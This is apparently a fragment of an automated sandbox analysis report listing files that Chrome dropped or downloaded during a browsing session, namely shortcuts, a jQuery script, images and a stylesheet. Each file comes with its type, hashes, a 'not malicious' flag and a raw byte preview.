(v = 0, d.push(n(m)), m = 0) : v++, t >>= 1; l--, 0 == l && (l = Math.pow(2, h), h++)
                                                                                                                                                          No context
                                                                                                                                                          No context
                                                                                                                                                          No context
                                                                                                                                                          No context
                                                                                                                                                          No context
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Sun Jun 9 21:40:22 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):2677
                                                                                                                                                          Entropy (8bit):3.9832974179087928
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:48:8Id7TjvvH1idAKZdA19ehwiZUklqehqy+3:8UnP9y
                                                                                                                                                          MD5:91906E2F3DC2905C62050BA1D4E9F129
                                                                                                                                                          SHA1:3E40FB8CB132039D73A08FF93E3A88162E94A791
                                                                                                                                                          SHA-256:6664A295E2883A877A2EB3CCE7B69F23C0405F08C0A7319ACBF7B12AA309EDA7
                                                                                                                                                          SHA-512:F8DCD37EF5B09DCE4083E3859ECA65E4F66A465430B1158CF86D9CD3BD280ED292AB49D19348F66C7075663E6D30A2E7A0B988FEA4E053FB528D96E6F5C524C3
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:L..................F.@.. ...$+.,............N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.X......B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.X......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.X............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.X.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........b.wY.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Sun Jun 9 21:40:22 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):2679
                                                                                                                                                          Entropy (8bit):4.000873034976943
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:48:8Gd7TjvvH1idAKZdA1weh/iZUkAQkqehty+2:8en19QAy
                                                                                                                                                          MD5:63D92573A8C8CA61E85F5D095A261B47
                                                                                                                                                          SHA1:FD5589364CF49554D2BB1CD473BBEE63FFF2DBE1
                                                                                                                                                          SHA-256:63449E58ADFE968028B015F4A0B01D765E000E88E57050AA19063D3D50486077
                                                                                                                                                          SHA-512:9AFFD7CA1C23E53112718E44BB8F68212C926C81223878A05E150BDCCD5FE0F308D0939231492537A2DC31C9562D745D86E366F591B7CCAE16E9B77247F97953
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:L..................F.@.. ...$+.,.....}......N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.X......B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.X......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.X............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.X.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........b.wY.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Oct 4 12:54:07 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):2693
                                                                                                                                                          Entropy (8bit):4.009272125190965
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:48:8x4d7TjvsH1idAKZdA14tseh7sFiZUkmgqeh7s7y+BX:8xEn4nBy
                                                                                                                                                          MD5:88062BE7AC6A78C3EB2452FCCCEC8AA5
                                                                                                                                                          SHA1:5C791649AA214B1753363BBCA331D83A52751101
                                                                                                                                                          SHA-256:3583A13A91C9F66A08C1D1B81CE808FFBBB784085EFFF81A2A3FD12D5ECA08AF
                                                                                                                                                          SHA-512:C21D66888291F122F1D755154F9079D0ED89C4C43DFDE79C2F1A11AC8614924320AFB74214C7DE4F9749AE59839ADDE76FC3B06085D7AC148CD2D58E15D8174B
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:L..................F.@.. ...$+.,......e>....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.X......B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.X......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.X............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VDW.n...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........b.wY.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Sun Jun 9 21:40:22 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):2681
                                                                                                                                                          Entropy (8bit):3.9965264102145204
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:48:8Lmd7TjvvH1idAKZdA1vehDiZUkwqehpy+R:8ynWDy
                                                                                                                                                          MD5:FDEF816DBCE9681E557990A575911C5D
                                                                                                                                                          SHA1:EF4E6CA019A0A4D92515FF59AE0FFF81C5D0AE80
                                                                                                                                                          SHA-256:DE9FC3FD11AA1631A253A8E209826D16CE303888C40FA218C3FEAB98F104CC2B
                                                                                                                                                          SHA-512:4B0067FBAC302762A093585974A0E10D7F7780DDD44C9F482094BAD42BCB7C96D2D06755332A4136A45C41D896917A9705E8AA21408B618FBA071817BA4057B2
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:L..................F.@.. ...$+.,....ZVk.....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.X......B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.X......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.X............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.X.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........b.wY.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Sun Jun 9 21:40:22 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):2681
                                                                                                                                                          Entropy (8bit):3.9866805299404855
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:48:87d7TjvvH1idAKZdA1hehBiZUk1W1qeh/y+C:8Fn29fy
                                                                                                                                                          MD5:28CB8FB0ABCF33ECFA9116ACEE89650D
                                                                                                                                                          SHA1:EDBD11A130D2A2F06E22C1874AA031ADD297BACE
                                                                                                                                                          SHA-256:55385A368E3D77903055E40989D346263FD5681DA5EB751FF60C7B9ABF5C14C9
                                                                                                                                                          SHA-512:709C50F46407D91590437566E8D0EFC75E0113875146D0B951C84ECD6E42FA5132F5E1E0BF143799C3DE33AE7B14E3DF25D24C79737CB27F54F8BC42159E5174
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:L..................F.@.. ...$+.,............N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.X......B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.X......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.X............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.X.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........b.wY.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Sun Jun 9 21:40:22 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):2683
                                                                                                                                                          Entropy (8bit):3.9977629014908254
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:48:8ad7TjvvH1idAKZdA1duT+ehOuTbbiZUk5OjqehOuTbBy+yT+:86nIT/TbxWOvTbBy7T
                                                                                                                                                          MD5:281F4AFC279888F1621B7F988CEFF033
                                                                                                                                                          SHA1:A7B273EEE9997D3FFCB039282D4ADF4C0011434A
                                                                                                                                                          SHA-256:5771B40EE46ABBBABD7DC79490EC7150EA83B2F1EBF782FBC963A678EA1F315F
                                                                                                                                                          SHA-512:B7E53986A0552E4C0514FFD8D11B45EA69DE9A1348EDD348108CD4CC9A81C20EFDEB5AF7ECCD45920F889AD9774CDB3101D00C22E10A1C3BA35AD1F3F2B73024
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:L..................F.@.. ...$+.,....r.Z.....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.X......B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.X......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.X............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.X.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........b.wY.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (32038)
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):95956
                                                                                                                                                          Entropy (8bit):5.39090392829012
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:1536:OP10iSi65U/dXXeyhzeBuG+HYE0WEeLDFoNqLTW8+S5VRZIVI6xSb8xh2ZbQnRmS:R+41ZqLTW8xRrqSb8qGH77da98Hr3
                                                                                                                                                          MD5:B091A47F6B91E26C93A848092C6F3788
                                                                                                                                                          SHA1:52918AF2D431E73464060B35D364640C8DB75606
                                                                                                                                                          SHA-256:329AB92B9276EF4E3148F69BE6B208969BEBDF2DB3121A589CAA172453FD9F10
                                                                                                                                                          SHA-512:AB444102BE476F0104EEFF79C9B596174852B4FE8CBD0B5A0279D56F106A166EC39304636E09326213DE000B102CE8F517BB268A9ABB2955C56EE4F18B464EA8
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://brhrjf.yuhu06.xyz/ftl/commonPage/js/jquery/jquery-1.11.3.min.js
                                                                                                                                                          Preview:/*! jQuery v1.11.3 | (c) 2005, 2015 jQuery Foundation, Inc. | jquery.org/license */.!function(a,b){"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){var c=[],d=c.slice,e=c.concat,f=c.push,g=c.indexOf,h={},i=h.toString,j=h.hasOwnProperty,k={},l="1.11.3",m=function(a,b){return new m.fn.init(a,b)},n=/^[\s\uFEFF\xA0]+|[\s\uFEFF\xA0]+$/g,o=/^-ms-/,p=/-([\da-z])/gi,q=function(a,b){return b.toUpperCase()};m.fn=m.prototype={jquery:l,constructor:m,selector:"",length:0,toArray:function(){return d.call(this)},get:function(a){return null!=a?0>a?this[a+this.length]:this[a]:d.call(this)},pushStack:function(a){var b=m.merge(this.constructor(),a);return b.prevObject=this,b.context=this.context,b},each:function(a,b){return m.each(this,a,b)},map:function(a){return this.pushStack(m.map(this,function(b,c){ret
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:GIF image data, version 89a, 1000 x 100
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):342855
                                                                                                                                                          Entropy (8bit):7.913871068105645
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:6144:gWaPnPnPnPnN0UMSkcKlfY+J1rhlfY+J1rhlfY+J1rhlfY+J1rhlfY+3:gv0vAKlQ+FlQ+FlQ+FlQ+FlQ+3
                                                                                                                                                          MD5:502023B7894F0D460759CDF4CCC25204
                                                                                                                                                          SHA1:C227B737103748EF0C36C9788B641B7EB882CA50
                                                                                                                                                          SHA-256:7395716C8983B841BA7487A515E3C5E1EEDDE36E11BFFA33BFBDB4C57B1504BC
                                                                                                                                                          SHA-512:847A5E4C4FA80876F170145D0F888EFEAD92534EB40549971266D88676FF3C07543E4D8F1F515471AE78C1CD12459ECF8B569B4D3053D3F301EB4900B54498A4
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://www.image110.com/uploads/0d303c466e9780aea6baef1054bb361c.gif
                                                                                                                                                          Preview:GIF89a..d....NNK.%..U......NjO1...I..oqoo...X0 0.{.......4.q-...6ZZ....O.......:...T:\.....nO..n....nN.J...yQ/...-......}...k...D..Q.d.....:.....L....:..l..T.|.....s..Q(...x.........q3....'..............y.....e.s(..................,...i....@.e..........A...O1....x.w..xt.f..D.^.......aWN..pkA*....#...........h..O.......().......q. ..................S.W..1......h..v...J...}`....y............bz............}..........\A....b........d......y..........XbV...S.....y...R.l....w...[....K..d....Y..^?.0d.i.<J". "......afd.......................d.R...!.n............h.._...........i...7...q..........f``.}.{.#.}|.e.y4.....e...............%........YXW..'....u................=.._$.....{ .........8..Y.................=AE...!..NETSCAPE2.0.....!..XMP DataXMP<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 "> <rdf:RDF xmlns:rdf="ht
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):2279
                                                                                                                                                          Entropy (8bit):6.883737991076074
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:48:x/6/zNnwknA9Wp8EsLcJ3T3zHFGyuQPEInp/Sxx5CEK+:xSBwknmWp8fMHFGQPE2Sxx5Ce
                                                                                                                                                          MD5:DD96633E29503CAF2EC2997CE4AB638F
                                                                                                                                                          SHA1:83DFAD13F9E3283599F4B0187034D692F37A28DE
                                                                                                                                                          SHA-256:C33D39FB33BF8B8EF1F3E27ABC824C851B8DBCE3E50B78E882E6EF7738DE6855
                                                                                                                                                          SHA-512:7AE62FC6C2C33375194755FD7279853F54996014B5BD105B707166C8F9398A9489BFA6C6482809CD5B870DA500195DE6BCA4C995E3C0E54F1B673693D5C69523
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/image-pc/index/382/slot/10042.png
                                                                                                                                                          Preview:.PNG........IHDR..............w=.....pHYs.................iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.1-c001 79.a8d475349, 2023/03/23-13:05:45 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/" xmp:CreatorTool="Adobe Photoshop CC 2015 (Windows)" xmp:CreateDate="2023-07-19T12:07:20+08:00" xmp:ModifyDate="2023-07-24T11:26:37+08:00" xmp:MetadataDate="2023-07-24T11:26:37+08:00" xmpMM:InstanceID="xmp.iid:29617963-8eac-4dfc-8f22-41532ed9cc03" xmpMM:DocumentID="xmp.did:DD74A15AF3A011E7908999C7A81A326F" xmpMM:OriginalDocumentID="xmp.did:DD74
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 30 x 30, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):2572
                                                                                                                                                          Entropy (8bit):7.568618565233695
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:48:LfvnLjICF8zDoeJ38q/yIUrXc9KqpZIqqYA7cUtH0hODmoZBbK:7tiHo0y5AvhqH7cU6Wne
                                                                                                                                                          MD5:D8FB2297DF62C98BCF7856FEB57B0942
                                                                                                                                                          SHA1:1A84A91A4EBE0F97FDF8B1732AD52327C716C496
                                                                                                                                                          SHA-256:F507FC6EBB4B2D51D9CCACB5529CF62FA37933DB1791C7084492B3342FC2C96B
                                                                                                                                                          SHA-512:E73410457471F7D997D624EF9013F7CD0D6BDA1DDD42D905AC30CB2714A2CCE1CE32CA6FE75C89267A72322CAB92C71C03185F40490C003BB09D623B0E8154A2
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb1-hw.qectyoua.com/pc/image-pc/nav/icon-s/sport_more.png
                                                                                                                                                          Preview:.PNG........IHDR.............;0......tEXtSoftware.Adobe ImageReadyq.e<...viTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 6.0-c002 79.164352, 2020/01/30-15:50:38 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:ea94d59f-af8e-3b40-82cf-f343901f80d7" xmpMM:DocumentID="xmp.did:AAE4A6578A0311EA958DC410567DB7B3" xmpMM:InstanceID="xmp.iid:AAE4A6568A0311EA958DC410567DB7B3" xmp:CreatorTool="Adobe Photoshop CC 2019 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:5bbece77-91f8-1d4c-bfc4-7cd89f8eb907" stRef:documentID="xmp.did:ea94d59f-af8e-3b40-82cf-f343901f80d7"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>.......,IDATx.WkP.e.=......r.!.4S.
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):438633
                                                                                                                                                          Entropy (8bit):5.367114784721158
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3072:eSUUEuK5a8lZkPUu6QUT63i6PSNhVY/KWkZTcxBBt2dxwXEASH44YeW+G0WlMsEk:RUUEuK5a8lZkP6QUT63i6PSNh/T2PEzY
                                                                                                                                                          MD5:26970A118CB16AD9D6157FBF4B5844D7
                                                                                                                                                          SHA1:F5E5879DA766A9B58F7B8867F70A1BD3C1890E39
                                                                                                                                                          SHA-256:C78D1670FE6172B011C1ED8BA7E6E29BE5A7BE82215C5EC4BCCD9E6395CE93F2
                                                                                                                                                          SHA-512:348086F6459C60F0D80501BB740BA4044E2CFB4EB0D542DA2883563EB4944422D579A0E32D51CAB8B444448462B3BE801983F848AE675B3DF9A6C4C9FE093B95
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/240516-03/static/css/t4043.css
                                                                                                                                                          Preview:.tutorial-body[data-v-e9757988]{min-width:1000px;background:#201b15 url(/pc/image-pc/tutorial/big-bg.jpg) no-repeat bottom;background-size:cover}.tutorial-body [data-v-e9757988],.tutorial-body [data-v-e9757988]:after,.tutorial-body [data-v-e9757988]:before{box-sizing:content-box}.tutorial-body .add-members[data-v-e9757988],.tutorial-body .home[data-v-e9757988]{position:absolute;right:13px;top:50%;transform:translateY(-50%)}.tutorial-body .add-members.home[data-v-e9757988],.tutorial-body .home.home[data-v-e9757988]{right:17px}.tutorial-top[data-v-e9757988]{background:url(/pc/image-pc/tutorial/tutorial-bg.jpg) repeat-x 0 0;height:100px;width:100%;padding:15px 0;border-bottom:3px solid #007989}.tutorial-title[data-v-e9757988]{height:1px;background:#4d4d4d;width:342px;margin:30px auto 0;text-align:center}.tutorial-title h1[data-v-e9757988]{color:#faf4e0;font-size:24px;position:relative;top:-15px;background:#272727;width:154px;margin:0 auto;font-weight:900}.tutorial-main[data-v-e9757988]{wi
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 30 x 30, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):2779
                                                                                                                                                          Entropy (8bit):7.67987959759948
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:48:VVsCvnujFJ3D71iwQ2T595pkqYfMY5BDxZYzPlxbJ7YcGrAPB+XB7:J2P71ir2T59OECBdZMx+drAPB27
                                                                                                                                                          MD5:28096D9486586F6F0F6A37DE4E639F72
                                                                                                                                                          SHA1:B041532873DF1BEFFEBCB97EC595E6973E890F09
                                                                                                                                                          SHA-256:0F3393C176B54A707E02142A1AC06BFB1B33BBB570EE4A0FF781C4CE32154D14
                                                                                                                                                          SHA-512:37F6D8BDDD9F0065080FEDD5B563D94BD31697D1BFE529FB93FCCCB11407A01CCCFE3EE72373DA59875120281F98CC7FF8CE932113ED770B2D63115C894CE15B
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb1-hw.qectyoua.com/pc/image-pc/nav/icon-s/sport_sexy_w.png
                                                                                                                                                          Preview:.PNG........IHDR.............;0......tEXtSoftware.Adobe ImageReadyq.e<...$iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 7.1-c000 79.dabacbb, 2021/04/14-00:39:44 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:DocumentID="xmp.did:A5717EED24D511EC9C59D68007445A1A" xmpMM:InstanceID="xmp.iid:A5717EEC24D511EC9C59D68007445A1A" xmp:CreatorTool="Adobe Photoshop 22.5 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:B3319408201511EC99A1C7F1AEAD39D0" stRef:documentID="xmp.did:B3319409201511EC99A1C7F1AEAD39D0"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>.......MIDATx..Wkl.W.=w...c...q[w.4nP....R.hJQU....RS....@T......*...B...R..xH.6...^I[Z..:..{..i......yr....?.
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS6 (Windows), datetime=2022:11:18 23:56:06], baseline, precision 8, 334x81, components 3
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):46771
                                                                                                                                                          Entropy (8bit):7.575033837509303
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:768:9vYynIPzYynhsJYyd1W3yXpfC+S+moyR5QNGcIU3hSom:lm1sJPtx3moyRSXI4hTm
                                                                                                                                                          MD5:22487EAF7B1F24218D98CB5EF9460884
